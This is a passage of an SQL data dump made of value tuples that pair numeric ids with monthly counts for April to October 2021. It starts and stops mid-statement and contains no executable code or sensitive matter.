3287,2,'202104',72),(1596,2,'202104',75),(1598,2,'202104',76),(3498,2,'202104',77),(335,2,'202104',82),(2904,2,'202104',83),(3489,2,'202104',84),(74,2,'202104',87),(1608,2,'202104',90),(3541,2,'202104',90),(84,2,'202104',91),(108,2,'202104',96),(3531,2,'202104',96),(89,2,'202104',99),(2503,2,'202104',99),(3282,2,'202104',101),(1582,2,'202104',103),(72,2,'202104',108),(3534,2,'202104',109),(2769,2,'202104',110),(87,2,'202104',111),(2309,2,'202104',116),(76,2,'202104',128),(68,2,'202104',135),(91,2,'202104',142),(1600,2,'202104',154),(1594,2,'202104',168),(1602,2,'202104',195),(80,2,'202104',233),(1586,2,'202104',315),(9,2,'202104',2031),(110,2,'202105',5),(106,2,'202105',6),(1739,2,'202105',16),(483,2,'202105',17),(1732,2,'202105',17),(2558,2,'202105',17),(3263,2,'202105',17),(3275,2,'202105',17),(3249,2,'202105',18),(3297,2,'202105',18),(479,2,'202105',19),(1699,2,'202105',19),(1705,2,'202105',19),(1730,2,'202105',19),(1772,2,'202105',19),(2964,2,'202105',19),(3124,2,'202105',19),(3245,2,'202105',19),(3257,2,'202105',19),(3269,2,'202105',19),(3482,2,'202105',19),(482,2,'202105',20),(486,2,'202105',20),(1713,2,'202105',20),(1782,2,'202105',20),(3023,2,'202105',20),(3117,2,'202105',20),(3229,2,'202105',20),(3316,2,'202105',20),(102,2,'202105',21),(1776,2,'202105',21),(2165,2,'202105',21),(2296,2,'202105',21),(3273,2,'202105',21),(3290,2,'202105',21),(1701,2,'202105',22),(1743,2,'202105',22),(1780,2,'202105',22),(2063,2,'202105',22),(2156,2,'202105',22),(2252,2,'202105',22),(3063,2,'202105',22),(3265,2,'202105',22),(1737,2,'202105',23),(1741,2,'202105',23),(2152,2,'202105',23),(2748,2,'202105',23),(2965,2,'202105',23),(2993,2,'202105',23),(3096,2,'202105',23),(3251,2,'202105',23),(3271,2,'202105',23),(488,2,'202105',24),(1703,2,'202105',24),(1711,2,'202105',24),(1745,2,'202105',24),(3090,2,'202105',24),(3259,2,'202105',24),(3278,2,'202105',24),(3307,2,'202105',24),(1697,2,'202105',25),(1734,2,'202105',25),(1768,2,'202105',25),(2150,2,'202105',25),(2293,2,'202105',25),(3006,2,'202105',25),(3240,2,'202105',25),(1584,2,'202105',26),(1749,2,'202105',26),(1778,2,'202105',26),(2956,2,'202105',26),(2991,2,'202105',26),(3107,2,'202105',26),(3261,2,'202105',26),(3280,2,'202105',26),(471,2,'202105',27),(477,2,'202105',27),(1590,2,'202105',27),(1724,2,'202105',27),(2804,2,'202105',27),(3243,2,'202105',27),(484,2,'202105',28),(2148,2,'202105',28),(2658,2,'202105',28),(2911,2,'202105',28),(3247,2,'202105',28),(1715,2,'202105',29),(1722,2,'202105',29),(2813,2,'202105',29),(3097,2,'202105',29),(3438,2,'202105',29),(476,2,'202105',30),(2775,2,'202105',30),(3479,2,'202105',30),(481,2,'202105',31),(485,2,'202105',31),(487,2,'202105',31),(1695,2,'202105',31),(1728,2,'202105',31),(1751,2,'202105',31),(2154,2,'202105',31),(2178,2,'202105',31),(2989,2,'202105',31),(3041,2,'202105',31),(3066,2,'202105',31),(3092,2,'202105',31),(3034,2,'202105',32),(3087,2,'202105',32),(3104,2,'202105',32),(3109,2,'202105',32),(3313,2,'202105',32),(469,2,'202105',33),(474,2,'202105',33),(1747,2,'202105',33),(1770,2,'202105',33),(3069,2,'202105',33),(3486,2,'202105',33),(3714,2,'202105',33),(1707,2,'202105',34),(3083,2,'202105',34),(3253,2,'202105',34),(3430,2,'202105',34),(480,2,'202105',35),(2248,2,'202105',35),(3004,2,'202105',35),(3079,2,'202105',35),(3127,2,'202105',35),(2161,2,'202105',36),(3072,2,'202105',36),(3267,2,'202105',36),(478,2,'202105',37),(1720,2,'202105',37),(3027,2,'202105',37),(3102,2,'202105',37),(3710,2,'202105',37),(1709,2,'202105',38),(3226,2,'202105',38),(2297,2,'202105',39),(472,2,'202105',40),(1766,2,'202105',40),(2617,2,'202105',40),(1774,2,'202105',41),(3045,2,'202105',41),(1726,2,'202105',42),(2801,2,'202105',42),(2809,2,'202105',42),(3005,2,'202105',42),(467,2,'202105',43),(3038,2,'202105',43),(1718,2,'202105',45),(2159,2,'202105',47),(2751,2,'202105',47),(468,2,'202105',48),(2769,2,'202105',49),(473,2,'202105',50),(1544,2,'202105',51),(2609,2,'202105',52),(470,2,'202105',53),(2704,2,'202105',55),(1610,2,'202105',56),(1612,2,'202105',57),(3060,2,'202105',60),(1604,2,'202105',61),(1614,2,'202105',65),(570,2,'202105',66),(1606,2,'202105',67),(1592,2,'202105',70),(1596,2,'202105',71),(2457,2,'202105',73),(3489,2,'202105',76),(1582,2,'202105',80),(1598,2,'202105',80),(3030,2,'202105',81),(3287,2,'202105',83),(3285,2,'202105',85),(335,2,'202105',90),(3498,2,'202105',91),(3541,2,'202105',95),(1608,2,'202105',96),(3282,2,'202105',96),(2904,2,'202105',98),(1588,2,'202105',100),(2309,2,'202105',102),(3534,2,'202105',102),(74,2,'202105',103),(2503,2,'202105',103),(3531,2,'202105',103),(84,2,'202105',106),(108,2,'202105',111),(87,2,'202105',116),(89,2,'202105',116),(72,2,'202105',120),(76,2,'202105',143),(68,2,'202105',160),(1594,2,'202105',181),(91,2,'202105',194),(1586,2,'202105',197),(1600,2,'202105',204),(1602,2,'202105',229),(80,2,'202105',262),(9,2,'202105',2102),(110,2,'202106',2),(3738,2,'202106',5),(3731,2,'202106',6),(3727,2,'202106',7),(106,2,'202106',8),(3721,2,'202106',8),(3724,2,'202106',10),(3742,2,'202106',11),(3735,2,'202106',12),(3749,2,'202106',12),(3273,2,'202106',13),(3746,2,'202106',13),(3090,2,'202106',14),(3096,2,'202106',14),(3124,2,'202106',14),(3752,2,'202106',15),(479,2,'202106',16),(481,2,'202106',16),(2293,2,'202106',16),(482,2,'202106',17),(485,2,'202106',17),(1768,2,'202106',17),(2993,2,'202106',17),(1751,2,'202106',18),(3240,2,'202106',18),(3249,2,'202106',18),(3257,2,'202106',18),(3275,2,'202106',18),(3297,2,'202106',18),(483,2,'202106',19),(488,2,'202106',19),(2748,2,'202106',19),(102,2,'202106',20),(1695,2,'202106',20),(1737,2,'202106',20),(2956,2,'202106',20),(3004,2,'202106',20),(3066,2,'202106',20),(3265,2,'202106',20),(3269,2,'202106',20),(1782,2,'202106',21),(2248,2,'202106',21),(2965,2,'202106',21),(3253,2,'202106',21),(3438,2,'202106',21),(1699,2,'202106',22),(1701,2,'202106',22),(1707,2,'202106',22),(1743,2,'202106',22),(2063,2,'202106',22),(2156,2,'202106',22),(2252,2,'202106',22),(2296,2,'202106',22),(2991,2,'202106',22),(3267,2,'202106',22),(3482,2,'202106',22),(1705,2,'202106',23),(1713,2,'202106',23),(1770,2,'202106',23),(3229,2,'202106',23),(3290,2,'202106',23),(3479,2,'202106',23),(486,2,'202106',24),(1722,2,'202106',24),(1732,2,'202106',24),(1776,2,'202106',24),(2964,2,'202106',24),(3023,2,'202106',24),(3027,2,'202106',24),(3092,2,'202106',24),(3107,2,'202106',24),(3117,2,'202106',24),(3259,2,'202106',24),(3263,2,'202106',24),(3280,2,'202106',24),(3316,2,'202106',24),(1697,2,'202106',25),(1711,2,'202106',25),(1720,2,'202106',25),(1739,2,'202106',25),(1780,2,'202106',25),(2165,2,'202106',25),(1590,2,'202106',26),(1703,2,'202106',26),(2813,2,'202106',26),(3038,2,'202106',26),(3041,2,'202106',26),(3063,2,'202106',26),(3097,2,'202106',26),(3104,2,'202106',26),(3278,2,'202106',26),(3489,2,'202106',26),(2152,2,'202106',27),(2558,2,'202106',27),(2658,2,'202106',27),(3243,2,'202106',27),(3271,2,'202106',27),(3307,2,'202106',27),(3430,2,'202106',27),(1715,2,'202106',28),(1772,2,'202106',28),(3006,2,'202106',28),(2161,2,'202106',29),(2801,2,'202106',29),(3045,2,'202106',29),(3109,2,'202106',29),(3251,2,'202106',29),(467,2,'202106',30),(476,2,'202106',30),(484,2,'202106',30),(2150,2,'202106',30),(3034,2,'202106',30),(477,2,'202106',31),(480,2,'202106',31),(1584,2,'202106',31),(1745,2,'202106',31),(1749,2,'202106',31),(3079,2,'202106',31),(3247,2,'202106',31),(3498,2,'202106',31),(471,2,'202106',32),(474,2,'202106',32),(1730,2,'202106',32),(1734,2,'202106',32),(2148,2,'202106',32),(2751,2,'202106',32),(3069,2,'202106',32),(3087,2,'202106',32),(3486,2,'202106',32),(472,2,'202106',33),(570,2,'202106',33),(2989,2,'202106',33),(3072,2,'202106',33),(3127,2,'202106',33),(469,2,'202106',34),(1726,2,'202106',34),(1741,2,'202106',34),(3005,2,'202106',34),(3102,2,'202106',34),(3226,2,'202106',34),(3245,2,'202106',34),(2775,2,'202106',35),(2911,2,'202106',35),(3313,2,'202106',35),(1709,2,'202106',36),(2804,2,'202106',36),(478,2,'202106',37),(487,2,'202106',37),(1724,2,'202106',37),(3261,2,'202106',37),(2178,2,'202106',38),(3060,2,'202106',38),(1728,2,'202106',39),(1778,2,'202106',39),(2769,2,'202106',40),(2809,2,'202106',41),(1610,2,'202106',42),(468,2,'202106',45),(1747,2,'202106',45),(1774,2,'202106',45),(2154,2,'202106',45),(1766,2,'202106',48),(3083,2,'202106',49),(470,2,'202106',52),(1718,2,'202106',53),(2617,2,'202106',53),(473,2,'202106',55),(1596,2,'202106',57),(3030,2,'202106',57),(1614,2,'202106',58),(1612,2,'202106',62),(2609,2,'202106',65),(1598,2,'202106',68),(1592,2,'202106',69),(2159,2,'202106',69),(2297,2,'202106',72),(2704,2,'202106',72),(3531,2,'202106',76),(2457,2,'202106',77),(1544,2,'202106',81),(1604,2,'202106',83),(1582,2,'202106',86),(1588,2,'202106',86),(3534,2,'202106',86),(1608,2,'202106',87),(2309,2,'202106',87),(3285,2,'202106',87),(3287,2,'202106',88),(3710,2,'202106',89),(335,2,'202106',92),(74,2,'202106',94),(84,2,'202106',95),(2904,2,'202106',95),(3541,2,'202106',95),(2503,2,'202106',96),(3282,2,'202106',96),(87,2,'202106',107),(3714,2,'202106',108),(72,2,'202106',109),(89,2,'202106',110),(1606,2,'202106',110),(108,2,'202106',117),(76,2,'202106',124),(1594,2,'202106',126),(1600,2,'202106',133),(68,2,'202106',141),(1586,2,'202106',170),(91,2,'202106',204),(1602,2,'202106',208),(80,2,'202106',280),(9,2,'202106',2050),(106,2,'202107',1),(110,2,'202107',8),(3249,2,'202107',16),(479,2,'202107',18),(482,2,'202107',18),(3316,2,'202107',18),(3721,2,'202107',18),(471,2,'202107',19),(488,2,'202107',19),(2252,2,'202107',19),(3090,2,'202107',19),(3297,2,'202107',19),(478,2,'202107',20),(481,2,'202107',20),(2293,2,'202107',20),(2964,2,'202107',20),(3027,2,'202107',20),(3041,2,'202107',20),(3066,2,'202107',20),(3097,2,'202107',20),(3117,2,'202107',20),(3247,2,'202107',20),(3269,2,'202107',20),(3271,2,'202107',20),(3727,2,'202107',20),(3735,2,'202107',20),(480,2,'202107',21),(1699,2,'202107',21),(1732,2,'202107',21),(1751,2,'202107',21),(1780,2,'202107',21),(2748,2,'202107',21),(3004,2,'202107',21),(3263,2,'202107',21),(3267,2,'202107',21),(1703,2,'202107',22),(1713,2,'202107',22),(1768,2,'202107',22),(1782,2,'202107',22),(2156,2,'202107',22),(2165,2,'202107',22),(2296,2,'202107',22),(2956,2,'202107',22),(3265,2,'202107',22),(3752,2,'202107',22),(483,2,'202107',23),(1705,2,'202107',23),(1743,2,'202107',23),(3006,2,'202107',23),(3038,2,'202107',23),(3229,2,'202107',23),(3253,2,'202107',23),(3275,2,'202107',23),(3278,2,'202107',23),(3738,2,'202107',23),(1590,2,'202107',24),(1697,2,'202107',24),(1711,2,'202107',24),(1720,2,'202107',24),(2154,2,'202107',24),(2993,2,'202107',24),(3124,2,'202107',24),(3430,2,'202107',24),(102,2,'202107',25),(1749,2,'202107',25),(1776,2,'202107',25),(2965,2,'202107',25),(2991,2,'202107',25),(3092,2,'202107',25),(3482,2,'202107',25),(485,2,'202107',26),(1730,2,'202107',26),(1739,2,'202107',26),(2152,2,'202107',26),(2161,2,'202107',26),(3023,2,'202107',26),(3072,2,'202107',26),(3273,2,'202107',26),(3746,2,'202107',26),(3771,2,'202107',26),(1707,2,'202107',27),(1745,2,'202107',27),(2063,2,'202107',27),(3087,2,'202107',27),(3096,2,'202107',27),(3240,2,'202107',27),(3259,2,'202107',27),(1722,2,'202107',28),(1737,2,'202107',28),(2617,2,'202107',28),(3102,2,'202107',28),(3104,2,'202107',28),(3109,2,'202107',28),(3243,2,'202107',28),(3245,2,'202107',28),(3438,2,'202107',28),(3781,2,'202107',28),(467,2,'202107',29),(476,2,'202107',29),(2178,2,'202107',29),(2801,2,'202107',29),(3257,2,'202107',29),(1715,2,'202107',30),(2558,2,'202107',30),(2804,2,'202107',30),(3005,2,'202107',30),(1741,2,'202107',31),(2911,2,'202107',31),(3079,2,'202107',31),(3280,2,'202107',31),(3489,2,'202107',31),(3724,2,'202107',31),(3731,2,'202107',31),(1701,2,'202107',32),(1747,2,'202107',32),(3045,2,'202107',32),(3107,2,'202107',32),(3261,2,'202107',32),(1772,2,'202107',33),(3063,2,'202107',33),(3127,2,'202107',33),(3479,2,'202107',33),(487,2,'202107',34),(1695,2,'202107',34),(2775,2,'202107',34),(2989,2,'202107',34),(3313,2,'202107',34),(3486,2,'202107',34),(484,2,'202107',35),(1778,2,'202107',35),(2297,2,'202107',35),(3290,2,'202107',35),(1734,2,'202107',36),(1774,2,'202107',36),(2658,2,'202107',36),(3226,2,'202107',36),(3498,2,'202107',36),(477,2,'202107',37),(1724,2,'202107',37),(2751,2,'202107',37),(3742,2,'202107',37),(3749,2,'202107',37),(1610,2,'202107',38),(1584,2,'202107',39),(3251,2,'202107',39),(3777,2,'202107',39),(469,2,'202107',40),(486,2,'202107',40),(1770,2,'202107',40),(2809,2,'202107',41),(474,2,'202107',42),(1544,2,'202107',42),(1709,2,'202107',42),(2150,2,'202107',42),(3714,2,'202107',42),(1728,2,'202107',43),(3774,2,'202107',43),(3034,2,'202107',44),(468,2,'202107',45),(2813,2,'202107',45),(3060,2,'202107',45),(470,2,'202107',46),(473,2,'202107',48),(2148,2,'202107',48),(3531,2,'202107',48),(472,2,'202107',49),(3069,2,'202107',49),(570,2,'202107',50),(3030,2,'202107',50),(3083,2,'202107',50),(2248,2,'202107',51),(1614,2,'202107',53),(1726,2,'202107',53),(74,2,'202107',56),(1612,2,'202107',56),(2704,2,'202107',56),(2769,2,'202107',56),(3307,2,'202107',56),(335,2,'202107',57),(3285,2,'202107',58),(3287,2,'202107',58),(1592,2,'202107',59),(1766,2,'202107',59),(3534,2,'202107',60),(3541,2,'202107',60),(3710,2,'202107',62),(2609,2,'202107',64),(2904,2,'202107',64),(108,2,'202107',66),(2457,2,'202107',66),(84,2,'202107',67),(72,2,'202107',68),(1718,2,'202107',68),(2159,2,'202107',71),(3282,2,'202107',75),(87,2,'202107',78),(2503,2,'202107',85),(1606,2,'202107',90),(1582,2,'202107',91),(1604,2,'202107',92),(76,2,'202107',93),(1608,2,'202107',94),(1598,2,'202107',96),(68,2,'202107',103),(1596,2,'202107',109),(1588,2,'202107',116),(89,2,'202107',123),(2309,2,'202107',127),(1594,2,'202107',128),(1600,2,'202107',138),(91,2,'202107',142),(3764,2,'202107',152),(1586,2,'202107',168),(1602,2,'202107',231),(80,2,'202107',246),(9,2,'202107',2151),(106,2,'202108',2),(110,2,'202108',4),(3489,2,'202108',12),(3738,2,'202108',12),(3269,2,'202108',13),(3316,2,'202108',13),(3721,2,'202108',13),(3727,2,'202108',13),(481,2,'202108',14),(2748,2,'202108',15),(2964,2,'202108',15),(3297,2,'202108',15),(2991,2,'202108',16),(3229,2,'202108',16),(3257,2,'202108',16),(3275,2,'202108',16),(1730,2,'202108',17),(2154,2,'202108',17),(3006,2,'202108',17),(3124,2,'202108',17),(3265,2,'202108',17),(3267,2,'202108',17),(3273,2,'202108',17),(3313,2,'202108',17),(3498,2,'202108',17),(482,2,'202108',18),(483,2,'202108',18),(2063,2,'202108',18),(3090,2,'202108',18),(3259,2,'202108',18),(3438,2,'202108',18),(1699,2,'202108',19),(1709,2,'202108',19),(2156,2,'202108',19),(2801,2,'202108',19),(3097,2,'202108',19),(3430,2,'202108',19),(3482,2,'202108',19),(3724,2,'202108',19),(476,2,'202108',20),(480,2,'202108',20),(1711,2,'202108',20),(2804,2,'202108',20),(3004,2,'202108',20),(3063,2,'202108',20),(3087,2,'202108',20),(3096,2,'202108',20),(3240,2,'202108',20),(3249,2,'202108',20),(3479,2,'202108',20),(3731,2,'202108',20),(102,2,'202108',21),(471,2,'202108',21),(485,2,'202108',21),(1703,2,'202108',21),(1705,2,'202108',21),(1732,2,'202108',21),(1751,2,'202108',21),(1772,2,'202108',21),(2775,2,'202108',21),(2993,2,'202108',21),(3066,2,'202108',21),(3247,2,'202108',21),(3263,2,'202108',21),(3486,2,'202108',21),(3735,2,'202108',21),(1713,2,'202108',22),(1715,2,'202108',22),(1782,2,'202108',22),(2152,2,'202108',22),(2558,2,'202108',22),(2965,2,'202108',22),(3034,2,'202108',22),(3107,2,'202108',22),(3243,2,'202108',22),(3271,2,'202108',22),(3752,2,'202108',22),(478,2,'202108',23),(1720,2,'202108',23),(1734,2,'202108',23),(1737,2,'202108',23),(1747,2,'202108',23),(1749,2,'202108',23),(1768,2,'202108',23),(1780,2,'202108',23),(2617,2,'202108',23),(3038,2,'202108',23),(3749,2,'202108',23),(479,2,'202108',24),(1590,2,'202108',24),(1726,2,'202108',24),(1739,2,'202108',24),(1778,2,'202108',24),(2165,2,'202108',24),(2293,2,'202108',24),(3027,2,'202108',24),(3261,2,'202108',24),(3531,2,'202108',24),(1584,2,'202108',25),(1701,2,'202108',25),(1743,2,'202108',25),(1745,2,'202108',25),(2150,2,'202108',25),(2178,2,'202108',25),(2252,2,'202108',25),(3041,2,'202108',25),(3079,2,'202108',25),(3104,2,'202108',25),(3280,2,'202108',25),(477,2,'202108',26),(486,2,'202108',26),(1697,2,'202108',26),(3092,2,'202108',26),(3109,2,'202108',26),(3278,2,'202108',26),(3746,2,'202108',26),(488,2,'202108',27),(1707,2,'202108',27),(1766,2,'202108',27),(2161,2,'202108',27),(3117,2,'202108',27),(3245,2,'202108',27),(3253,2,'202108',27),(3534,2,'202108',27),(484,2,'202108',28),(1722,2,'202108',28),(1770,2,'202108',28),(2148,2,'202108',28),(2956,2,'202108',28),(3290,2,'202108',28),(3742,2,'202108',28),(1776,2,'202108',29),(2296,2,'202108',29),(2751,2,'202108',30),(1695,2,'202108',31),(2911,2,'202108',31),(467,2,'202108',32),(1741,2,'202108',32),(2248,2,'202108',32),(3127,2,'202108',32),(3714,2,'202108',32),(2658,2,'202108',33),(3023,2,'202108',33),(473,2,'202108',34),(1610,2,'202108',34),(2297,2,'202108',35),(3072,2,'202108',35),(3307,2,'202108',35),(3226,2,'202108',37),(3774,2,'202108',37),(570,2,'202108',38),(1724,2,'202108',38),(1774,2,'202108',38),(3102,2,'202108',38),(3251,2,'202108',38),(487,2,'202108',39),(2809,2,'202108',39),(2989,2,'202108',39),(2769,2,'202108',40),(3285,2,'202108',40),(3710,2,'202108',40),(469,2,'202108',41),(470,2,'202108',41),(474,2,'202108',41),(2609,2,'202108',41),(468,2,'202108',42),(1612,2,'202108',42),(1718,2,'202108',42),(1728,2,'202108',42),(3045,2,'202108',42),(1544,2,'202108',43),(1608,2,'202108',43),(3541,2,'202108',44),(2704,2,'202108',45),(3287,2,'202108',45),(74,2,'202108',46),(3060,2,'202108',46),(3771,2,'202108',46),(2813,2,'202108',47),(3282,2,'202108',47),(1596,2,'202108',49),(3005,2,'202108',50),(3777,2,'202108',50),(1592,2,'202108',52),(3083,2,'202108',54),(335,2,'202108',55),(1614,2,'202108',56),(2457,2,'202108',57),(108,2,'202108',58),(472,2,'202108',58),(3069,2,'202108',58),(2159,2,'202108',59),(3030,2,'202108',61),(1588,2,'202108',68),(1604,2,'202108',70),(84,2,'202108',72),(72,2,'202108',73),(2503,2,'202108',76),(1600,2,'202108',82),(76,2,'202108',83),(1606,2,'202108',86),(87,2,'202108',89),(1594,2,'202108',92),(1582,2,'202108',101),(2309,2,'202108',104),(1598,2,'202108',106),(68,2,'202108',109),(1586,2,'202108',140),(91,2,'202108',142),(89,2,'202108',156),(1602,2,'202108',242),(80,2,'202108',262),(2904,2,'202108',302),(3764,2,'202108',1008),(3781,2,'202108',1070),(9,2,'202108',2342),(4440,2,'202109',1),(4444,2,'202109',1),(4448,2,'202109',1),(4404,2,'202109',2),(4408,2,'202109',2),(4412,2,'202109',2),(4416,2,'202109',2),(4424,2,'202109',2),(4428,2,'202109',2),(4432,2,'202109',2),(4436,2,'202109',2),(4420,2,'202109',3),(106,2,'202109',7),(4387,2,'202109',7),(4377,2,'202109',8),(4357,2,'202109',9),(4238,2,'202109',10),(4363,2,'202109',10),(4368,2,'202109',10),(4373,2,'202109',10),(4382,2,'202109',10),(110,2,'202109',11),(4391,2,'202109',11),(4323,2,'202109',12),(4326,2,'202109',12),(4396,2,'202109',12),(4400,2,'202109',12),(3727,2,'202109',13),(4329,2,'202109',13),(481,2,'202109',14),(1709,2,'202109',14),(3731,2,'202109',14),(1772,2,'202109',15),(2293,2,'202109',15),(2748,2,'202109',15),(3721,2,'202109',15),(2156,2,'202109',16),(3097,2,'202109',16),(3259,2,'202109',16),(3531,2,'202109',16),(482,2,'202109',17),(3096,2,'202109',17),(3229,2,'202109',17),(3253,2,'202109',17),(3534,2,'202109',17),(3738,2,'202109',17),(4338,2,'202109',17),(1695,2,'202109',18),(1705,2,'202109',18),(1713,2,'202109',18),(1722,2,'202109',18),(1743,2,'202109',18),(1745,2,'202109',18),(1751,2,'202109',18),(2152,2,'202109',18),(2658,2,'202109',18),(2993,2,'202109',18),(3124,2,'202109',18),(3247,2,'202109',18),(3251,2,'202109',18),(3265,2,'202109',18),(3297,2,'202109',18),(3714,2,'202109',18),(476,2,'202109',19),(479,2,'202109',19),(1697,2,'202109',19),(1715,2,'202109',19),(1720,2,'202109',19),(1780,2,'202109',19),(2248,2,'202109',19),(3107,2,'202109',19),(3109,2,'202109',19),(3249,2,'202109',19),(3489,2,'202109',19),(3498,2,'202109',19),(480,2,'202109',20),(1590,2,'202109',20),(1711,2,'202109',20),(1749,2,'202109',20),(1782,2,'202109',20),(2252,2,'202109',20),(3066,2,'202109',20),(3087,2,'202109',20),(3226,2,'202109',20),(3243,2,'202109',20),(3257,2,'202109',20),(3273,2,'202109',20),(3486,2,'202109',20),(3749,2,'202109',20),(4332,2,'202109',20),(483,2,'202109',21),(1703,2,'202109',21),(1707,2,'202109',21),(1730,2,'202109',21),(1768,2,'202109',21),(2063,2,'202109',21),(3063,2,'202109',21),(3092,2,'202109',21),(3104,2,'202109',21),(3263,2,'202109',21),(3278,2,'202109',21),(3280,2,'202109',21),(3430,2,'202109',21),(102,2,'202109',22),(1701,2,'202109',22),(1734,2,'202109',22),(2161,2,'202109',22),(2178,2,'202109',22),(2558,2,'202109',22),(2991,2,'202109',22),(3240,2,'202109',22),(3438,2,'202109',22),(4301,2,'202109',22),(486,2,'202109',23),(1699,2,'202109',23),(1732,2,'202109',23),(1737,2,'202109',23),(1747,2,'202109',23),(1766,2,'202109',23),(3072,2,'202109',23),(3079,2,'202109',23),(3261,2,'202109',23),(3271,2,'202109',23),(3290,2,'202109',23),(484,2,'202109',24),(1774,2,'202109',24),(2751,2,'202109',24),(2956,2,'202109',24),(2964,2,'202109',24),(2965,2,'202109',24),(3269,2,'202109',24),(3275,2,'202109',24),(3285,2,'202109',24),(3307,2,'202109',24),(3479,2,'202109',24),(3746,2,'202109',24),(4341,2,'202109',24),(485,2,'202109',25),(2150,2,'202109',25),(2989,2,'202109',25),(3006,2,'202109',25),(3245,2,'202109',25),(3267,2,'202109',25),(3735,2,'202109',25),(4335,2,'202109',25),(1770,2,'202109',26),(1778,2,'202109',26),(3090,2,'202109',26),(3313,2,'202109',26),(3771,2,'202109',26),(570,2,'202109',27),(1724,2,'202109',27),(1776,2,'202109',27),(2154,2,'202109',27),(3023,2,'202109',27),(3041,2,'202109',27),(3282,2,'202109',27),(3316,2,'202109',27),(3541,2,'202109',27),(3724,2,'202109',27),(477,2,'202109',28),(1741,2,'202109',28),(2617,2,'202109',28),(2801,2,'202109',28),(3004,2,'202109',28),(3027,2,'202109',28),(3038,2,'202109',28),(478,2,'202109',29),(1739,2,'202109',29),(2165,2,'202109',29),(2297,2,'202109',29),(2775,2,'202109',29),(3752,2,'202109',29),(473,2,'202109',30),(1584,2,'202109',30),(3034,2,'202109',30),(3482,2,'202109',30),(3287,2,'202109',31),(1726,2,'202109',32),(3117,2,'202109',32),(3710,2,'202109',32),(3742,2,'202109',32),(3777,2,'202109',32),(467,2,'202109',33),(1612,2,'202109',33),(2148,2,'202109',33),(2911,2,'202109',33),(469,2,'202109',34),(2704,2,'202109',34),(487,2,'202109',35),(488,2,'202109',35),(2804,2,'202109',35),(74,2,'202109',36),(1610,2,'202109',36),(2769,2,'202109',36),(2809,2,'202109',36),(3774,2,'202109',36),(471,2,'202109',37),(3060,2,'202109',37),(3127,2,'202109',37),(3069,2,'202109',38),(470,2,'202109',39),(468,2,'202109',40),(472,2,'202109',40),(3030,2,'202109',40),(474,2,'202109',41),(2296,2,'202109',41),(3102,2,'202109',41),(2609,2,'202109',42),(2159,2,'202109',43),(3005,2,'202109',43),(1604,2,'202109',45),(1544,2,'202109',46),(4275,2,'202109',46),(1614,2,'202109',48),(2457,2,'202109',48),(3045,2,'202109',48),(1592,2,'202109',50),(1608,2,'202109',52),(1728,2,'202109',52),(1606,2,'202109',61),(335,2,'202109',62),(2813,2,'202109',62),(108,2,'202109',63),(1718,2,'202109',63),(3764,2,'202109',63),(1582,2,'202109',69),(1596,2,'202109',71),(2309,2,'202109',75),(84,2,'202109',76),(1594,2,'202109',77),(1600,2,'202109',77),(3781,2,'202109',79),(1598,2,'202109',81),(76,2,'202109',85),(91,2,'202109',90),(3083,2,'202109',105),(68,2,'202109',106),(1588,2,'202109',106),(72,2,'202109',119),(87,2,'202109',122),(1586,2,'202109',126),(2503,2,'202109',130),(89,2,'202109',150),(1602,2,'202109',220),(80,2,'202109',227),(2904,2,'202109',489),(9,2,'202109',3005),(106,2,'202110',8),(2293,2,'202110',8),(3541,2,'202110',8),(3287,2,'202110',9),(110,2,'202110',10),(1780,2,'202110',12),(2252,2,'202110',12),(3240,2,'202110',12),(3249,2,'202110',12),(3267,2,'202110',12),(3269,2,'202110',12),(3731,2,'202110',12),(1707,2,'202110',13),(1743,2,'202110',13),(1782,2,'202110',13),(3096,2,'202110',13),(3104,2,'202110',13),(3531,2,'202110',13),(3534,2,'202110',13),(3727,2,'202110',13),(480,2,'202110',14),(1745,2,'202110',14),(1772,2,'202110',14),(2152,2,'202110',14),(3023,2,'202110',14),(3027,2,'202110',14),(3066,2,'202110',14),(3079,2,'202110',14),(3229,2,'202110',14),(3259,2,'202110',14),(3271,2,'202110',14),(3735,2,'202110',14),(3738,2,'202110',14),(4387,2,'202110',14),(481,2,'202110',15),(1697,2,'202110',15),(1701,2,'202110',15),(1705,2,'202110',15),(1739,2,'202110',15),(1774,2,'202110',15),(3275,2,'202110',15),(3438,2,'202110',15),(3749,2,'202110',15),(3752,2,'202110',15),(476,2,'202110',16),(1590,2,'202110',16),(1699,2,'202110',16),(1709,2,'202110',16),(1747,2,'202110',16),(2801,2,'202110',16),(2965,2,'202110',16),(3243,2,'202110',16),(3282,2,'202110',16),(3297,2,'202110',16),(3774,2,'202110',16),(4377,2,'202110',16),(482,2,'202110',17),(483,2,'202110',17),(1713,2,'202110',17),(1715,2,'202110',17),(1751,2,'202110',17),(1766,2,'202110',17),(1768,2,'202110',17),(1778,2,'202110',17),(2156,2,'202110',17),(2248,2,'202110',17),(2748,2,'202110',17),(2991,2,'202110',17),(2993,2,'202110',17),(3041,2,'202110',17),(3090,2,'202110',17),(3109,2,'202110',17),(3253,2,'202110',17),(3265,2,'202110',17),(3273,2,'202110',17),(3278,2,'202110',17),(3479,2,'202110',17),(3489,2,'202110',17),(3724,2,'202110',17),(4363,2,'202110',17),(479,2,'202110',18),(1732,2,'202110',18),(1734,2,'202110',18),(2161,2,'202110',18),(2558,2,'202110',18),(2964,2,'202110',18),(3038,2,'202110',18),(3097,2,'202110',18),(3285,2,'202110',18),(3721,2,'202110',18),(4329,2,'202110',18),(4357,2,'202110',18),(4382,2,'202110',18),(4428,2,'202110',18),(102,2,'202110',19),(488,2,'202110',19),(1703,2,'202110',19),(1737,2,'202110',19),(2150,2,'202110',19),(2178,2,'202110',19),(2658,2,'202110',19),(3102,2,'202110',19),(3107,2,'202110',19),(3124,2,'202110',19),(3226,2,'202110',19),(3257,2,'202110',19),(3263,2,'202110',19),(3280,2,'202110',19),(4275,2,'202110',19),(4391,2,'202110',19),(1610,2,'202110',20),(1749,2,'202110',20),(1776,2,'202110',20),(2063,2,'202110',20),(3034,2,'202110',20),(3486,2,'202110',20),(3714,2,'202110',20),(4323,2,'202110',20),(4404,2,'202110',20),(4408,2,'202110',20),(4424,2,'202110',20),(1720,2,'202110',21),(3247,2,'202110',21),(3251,2,'202110',21),(3261,2,'202110',21),(3316,2,'202110',21),(3498,2,'202110',21),(4373,2,'202110',21),(4412,2,'202110',21),(467,2,'202110',22),(477,2,'202110',22),(484,2,'202110',22),(1711,2,'202110',22),(1724,2,'202110',22),(1741,2,'202110',22),(1770,2,'202110',22),(2148,2,'202110',22),(2751,2,'202110',22),(2775,2,'202110',22),(2989,2,'202110',22),(3006,2,'202110',22),(3072,2,'202110',22),(3092,2,'202110',22),(3430,2,'202110',22